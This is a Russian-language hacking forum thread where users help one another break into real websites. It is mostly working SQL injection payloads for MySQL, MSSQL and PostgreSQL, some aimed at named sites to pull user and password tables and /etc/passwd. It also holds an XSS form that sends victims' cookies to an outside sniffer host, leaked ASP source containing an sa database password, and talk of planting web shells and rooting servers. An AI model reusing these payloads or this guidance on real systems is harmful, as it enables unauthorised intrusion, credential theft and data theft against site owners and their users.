Я думаю человек просто ошибся,и хотел сказать именно про INTO DUMP_FILE.
Вообще,может быть что угодно :) Может быть висит демон,который блокирует любые изменения в файловой структуре сервера,да ктож его знает
2bons посмотри процессы,попробуй записать файл в /tmp/ ,затем mv в нужную директорию.Возможно так получиться.

2 jokester:

Если зашел под рутом и доступно изменение БД mysql (для того, чтобы изменить права рута, иногда тупо оставляют рут доступ, но у рута (который же может и изменить эти права) отбирают права на некоторые функции) - в этом случае. Как на это влияет safe_mode - честно, не знаю.

PS: Сорри, читаю невнимательно, даже не понял про что речь шла, думал про заливку из phpmyadmin

bons, а что показывает df и cat /etc/fstab?

df -h:
Filesystem Size Used Avail Use% Mounted on
/dev/sda6 5.7G 3.9G 1.6G 71% /
/dev/sda5 9.7G 952M 8.2G 11% /home
/dev/sda2 34G 8.4G 24G 27% /var
/dev/sda3 24G 3.3G 20G 15% /opt
/dev/sda9 66G 2.0G 61G 4% /usr
/dev/sda1 107M 37M 65M 37% /boot
tmpfs 502M 0 502M 0% /dev/shm
cat /etc/fstab:
LABEL=/ / ext3 defaults 1 1
LABEL=/home /home ext3 defaults 1 2
LABEL=/var /var ext3 defaults 1 2
LABEL=/opt /opt ext3 defaults 1 2
LABEL=/usr /usr ext3 defaults 1 2
LABEL=/tmp /tmp ext3 defaults, noexec 1 2
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda8 swap swap defaults 0 0

уже отмечал, что места хватает,
смонтирован вроде без особых нюансов
2bons посмотри процессы,попробуй записать файл в /tmp/ ,затем mv в нужную директорию.Возможно так получиться.
из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.

df -h:
Filesystem Size Used Avail Use% Mounted on
/dev/sda6 5.7G 3.9G 1.6G 71% /
/dev/sda5 9.7G 952M 8.2G 11% /home
/dev/sda2 34G 8.4G 24G 27% /var
/dev/sda3 24G 3.3G 20G 15% /opt
/dev/sda9 66G 2.0G 61G 4% /usr
/dev/sda1 107M 37M 65M 37% /boot
tmpfs 502M 0 502M 0% /dev/shm
cat /etc/fstab:
LABEL=/ / ext3 defaults 1 1
LABEL=/home /home ext3 defaults 1 2
LABEL=/var /var ext3 defaults 1 2
LABEL=/opt /opt ext3 defaults 1 2
LABEL=/usr /usr ext3 defaults 1 2
LABEL=/tmp /tmp ext3 defaults, noexec 1 2
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda8 swap swap defaults 0 0

уже отмечал, что места хватает,
смонтирован вроде без особых нюансов

из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.
Интересная ситуация :)
А в других директориях копируеться,создаеться нормально? Таких как /tmp/ и подобные,с привилегией RWD? Тогда я бы искал альтернативу,шелл через логи,через сторонний сайт,поиск других директорий,или создание новых :)

Расскажи плз как можно расставить такие права
на andrew file system такие права можно поставить =)
bons, попробуй в /var/tmp/

Почему-то, несмотря на то что права на данную папку и все файлы в ней rwxrwxrwx функция php is_writable говорит что прав на запись нет :/
Доп инфо: владелец файлов apache:apache, права у меня: uid=48(apache) gid=48(apache) groups=48(apache)

в общем-то шелл удалось залить на соседний сайт там таких проблем не возникло. Порутать серв не удалось несмотря на то что ядро обновлялось достаточно давно.
Вопрос про права в этой папке остается нерешенным.

Спайдер прав, drwxrwxrwx - не показатель, по крайней мере для AFS.
Немного теории:

К примеру такое назначение AFS ACL, как "system:anyuser r" - дает права на чтение файла любому юзеру.
Смотрятся текущие права довольно просто:
fs listacl dir_name
Устанавливаются еще проще:
fs setacl dir_name username user_rights

бла бла бла..

почему не выводит пароля и логина?
http://www.thekarchergroup.mobi/mobile-news.php?id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+tblUser--

id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+Adalet.tblUser--+

Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции.

Я обычно использую такой запрос для поиска актуальных таблиц

1+union+select+1,table_name,3,4+from+information_s chema.columns+where+column_name+like+0x256d61696c2 5/*

Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп.

Спасибо Большое! +10 тебе! :)

Есть еще кое что. Во время ковыряния на этом сайте, на одной из страниц как то вывалилась такая ошибочка, хорошо что сохранил:
<% err_mess1=0 msg=0 if request.form("Send").Count>0 then name=Trim(replace(Request.Form("name"), "'", "’")) mail=Trim(replace(Request.Form("mail"), "'", "’")) if len(name)=0 or len(mail)=0 then err_mess1=1 else 'connection_string="DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/gbdb.mdb") & ";" Set Conn1 = Server.CreateObject("ADODB.Connection") Conn1.Open "DRIVER=SQL Server;SERVER=SERVER;UID=sa;APP=Microsoft Open Database Connectivity;WSID=server;DATABASE=promtractor;Netw ork=DBMSSOCN;User Id=sa;PASSWORD=kpangen;" if request.Form("r1")="1" then set rc_check=SErver.createObject("ADODB.RECORDSET") rc_check.open "select * from subscribe where mail='"+mail+"'", conn1 if rc_check.eof then rc_check.close conn1.execute("insert into subscribe (name, mail) values ('"+name+"', '"+mail+"')") msg=1 else rc_check.close msg=3 end if else conn1.execute ("delete from subscribe where mail='"+mail+"'") msg=2 end if conn1.close end if end if if err_mess1>0 or msg=0 then %><% else response.write "" end if %>

Случайно не MSSQL? Sa- привелигированный пользователь MSSQL.

есть sqli на mssql, надо узнать rows определенного столбца, но count() не выводит результата. Инъекция через convert(int())
как выводит результатов, данные таблицы выводится но база большая хочу узнать общее количество строк.Еще обьединеие результатов через Concat()/concat_ws()/group_concat() ошибку выдает

count() возвращает int, поэтому необходимо преобразовать к типу varchar. Однако mssql преобразует строку обратно в число, поэтому я обычно делаю substring():
SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM information_schema.TABLES);
В запросе выше как раз есть пример конкатенации строк, для этого используется "+", методом GET необходимо использовать %2B.
Про аналог GROUP_CONCAT в MSSQL: http://raz0r.name/obzory/select-for-xml-sql-injection/

тогда запрось типа:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+c ount('Email')+from+tbl_Members))--
будеть


http://localhost/script.asp?id=4'+and+1=convert(int,(SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM tbl_Members)));
правильно я понял?

Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--

']Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
не погло ((

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near 'cast'.
а '^' обязательно ли

http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'%2BCAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--

ООООО молодец спс сработал
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the varchar value '^190539' to data type int.

респект
Где прочитат про Cast?

http://msdn.microsoft.com/en-us/library/ms187928.aspx

Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?



http://clip2net.com/clip/m28193/thumb640/1258351952-clip-29kb.png (http://clip2net.com/page/m28193/2594509)

всем пионерам спасибо (:

']Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?



http://clip2net.com/clip/m28193/thumb640/1258351952-clip-29kb.png (http://clip2net.com/page/m28193/2594509)

всем пионерам спасибо (:
ручками чекни

']Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?

всем пионерам спасибо (:

хочешь - дай ссылку в личку, прочекаю

Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером.

<html>
<body>
<form name="xss" action="http://***.com.ua//index.jsp" method="post">
<input type="hidden" name="com" value="***">
<input type="hidden" name="***" value='1000">
<script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>

Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации.

Кхм, подскажите пожалуйста, как посчитать кол-во таблиц при PostgreSQL inj из information_schema.tables? В гугле что-то нифига нету

PS: Тот же самый вопрос и про кол-во колонок в табле и про кол-во данных в табле

Спасибо

Стандартные count(*) не работают что-то

в этой мегатеме

https://forum.antichat.ru/threadnav35599-1-10.html

живу уже два часа, там есть всё - как то, как это, а как посчитать - нету

сегодня чисто случайно искал информацию(по медицине) и нашел такое:
__http://www.cardiosite.ru/doctors/registration.aspx
здесь ошибка такая:
Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately.

Compiler Error Message: JS1241: Type 'ALP.Data.SqlData.QueryS' could not be found, is an assembly reference missing?

Source Error:



[No relevant source lines]


Source File: D:\sites\cardio\_controls\users\user-registration-solvay.ascx Line: 184 можно смело понять, что там IIS (ну и с MSSQL)

И хотел узнать - это что за ошибка и ошибка чего? IIS или SQL ? И как можно (или вобше можно) это использовать ?

P.S. Кстати, нажимая Show Detailed Compiler Output: можно получить еще кучу информации. там введены таблицы, да ? (UserIP, tbUserLastName, tbUserFirstName и т.д.)

Pashkela, только count или limit


Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы
лучше свой линк в студию ;)

2 l1ght:

Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы

лучше свой линк в студию

отправил в личку

Pashkela

count(*) отлично работает везде, уверен, что ты забываешь о приведении типов, из-за этого и проблемы

PS. Я бы дал линк, но ты-же начнёшь там свою чудопрогу тестить, и будет на нормальном сайте жопа в логах :)

2 jokester:

и будет на нормальном сайте жопа в логах

POST|GET|PROXY и жопа и в логах? :) Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку

2 jokester:
POST|GET|PROXY и жопа и в логах? :) Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку
Отписал ответ в ПМ, по поводу проги тоже :)

По поводу отмазываться, спасибо, оценил

2 jokester:

спасибо, помогло :cool:

каким актульным сплоитом можно атаковать 143 или 25 или 119
заранее спасибо

Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером.

<html>
<body>
<form name="xss" action="http://***.com.ua//index.jsp" method="post">
<input type="hidden" name="com" value="***">
<input type="hidden" name="***" value='1000">
<script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>

Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации.

Уточняю проблему, у клиентской части скрипт проводит успешно xss инъекцию через POST, и выводит в стиле ***.com/s.php?SESSIONID=0BA480B72D67E063B2FD65FDC66D;%20au thlogin=Lol;%20auth=e827b3871c8906ff8973b257bb2e9.

Все что после знака ? есть QUERY_STRING, а в сниффаке четко прописано

if ($file)
{ $f = fopen($filename, 'a');
flock($f,2);
fputs($f, $QUERY_STRING."\r\n\r\n\r\n");
fflush ($f);
flock($f,3);
fclose($f); }

Почему данные не уплывают на сниффер?

P.s. С куниковским сниффаком та же фигня. Я не представляю в чем проблема.

Нужна помощь с ответами по этим вопросам: http://forum.antichat.ru/thread155501.html

//база MSSQL

итак, вернёмся к моим баранам
из нужной базы которая называется accountinfo, вот этим запросом, я вытянул названи нужной мне таблицы

http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(select+top+1+table_name +from+accountinfo.information_schema.tables+where+ table_name+NOT+IN+(select+top+0+table_name+from+ac countinfo.information_schema.tables)+))--

она под номером 0 под названием sales_rpt

затем из этой таблицы я получил нужную мне колонку

http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(select+top+1+column_nam e+from+accountinfo.information_schema.columns+wher e+column_name+NOT+IN+(select+top+0+column_name+fro m+accountinfo.information_schema.columns)+))--

она тоже под номером 0 и называется accumulated_rp


так вот, в этой же базе под номером 7 таблица AccountInfo

из которой мне нужно вывести колонки, но у меня не получается вывести колонки. как правильно заепашить запрос?

пробовал так

http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(select+AccountInfo+colu mn_name+from+accountinfo.information_schema.column s+where+column_name+NOT+IN+(select+top+1+column_na me+from+accountinfo.information_schema.columns)+))--

но не выводит

select column_name from accountinfo.information_schema.columns where table_name='AccountInfo'

не?(

Есть инъекция, делаю запрос на load_file и ничего не выходит,
xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const(substr(load_file('/etc/passwd'),1),1),name_const(substr(load_file('/etc/passwd'),1),1))a)b/*
Что делаю нетак? двойной запрос..

запрос на просмотр таблиц выглядит так:

xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/*

M1ks, а таблицы то выводятся?

Значит прав нет. (FILE_PRIV = N ?)

Что делаю нетак?

Ты нифига не читаешь. Даже мою подпись :(

двойной запрос, лоад_файл....

У меня возле компьютера стоит чашка с кофе, почему телефон не звонит, ведь сигареты кончились?

Собственно интересует вопрос по разграничению прав не веб-сервере.
Какие права присваиваются например веб-шеллу который исполняется по средствам например eval, т.е. например есть CMS через которую можно добавить какую-либо запись на сайт, и она записывается в БД к примеру так
----------------------------------------------
| id | author | text |
----------------------------------------------
| 22 | joker1 | <?phpinfo()?> |
----------------------------------------------
ну и выводится так:
<html>
<head>
</head>
<body>
<?php
// запрос к БД который получение данных например
// в массив и импортированный например extract() и вот на выходе имеется
?>
<br>автор: <?php echo $id; ?>
<br>текст:</br>
<?php echo $text; ?>
</body>
</html>

ну или подобный вариант с eval только вывод будет немного иначе.

ну и соответственно что динамически присваивается id и доступен по адресу например index?id=[num]
Какие права будут у этого допустим веб-шелла, если как вы понимаете указать тот же system() или eval()?
Если например ему присвоются права index.php, то почему например на практике, это срабатывает не всегда, когда например у того же index.php права 777

вобще-то:
права пользователя, от имени которого запущен веб-сервер.
Исключения - при использовании suexec и т.п.

Быть может ты хотел узнать кто будет владельцем файла и я не так истолковал твой вопрос?))

Какие права будут у этого допустим веб-шелла, если как вы понимаете указать тот же system() или eval()?
Если например ему присвоются права index.php, то почему например на практике, это срабатывает не всегда, когда например у того же index.php права 777
эм права у чего? ты о чем? у index.php нет прав. ты путаешь права пользователя на доступ(чтение, запись, исполнение) к файлам и аттрибуты файла показывающие каким пользователям разрешен доступ(чтение, запись, исполнение) к файлу.
man chmod и вообще почитай как-нибудь книгу о *nix'ax.
как я понял вопрос - так я на него и ответил

Что скажите по этой ошибке? Похоже какая-то проблема со скобками?
Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1))' at line 1

так нормально
...id=36+and+1=0
так ошибка
...id=36+and+1=0+union+select+1

попробуй так:

...id=36+and+1=0+and+substring(version(),1,1)=5
...id=36+and+1=0+and+substring(version(),1,1)=4
...id=36+and+1=0+and+substring(version(),1,1)=3

плюс различные фильтры "--+", "/*", "#" (версию выясни для начала)

попробуй так:

...id=36+and+1=0+and+substring(version(),1,1)=5
...id=36+and+1=0+and+substring(version(),1,1)=4
...id=36+and+1=0+and+substring(version(),1,1)=3

плюс различные фильтры "--+", "/*", "#" (версию выясни для начала)

тогда вот так...
id=36+and+substring(version(),1,1)=5

версия 5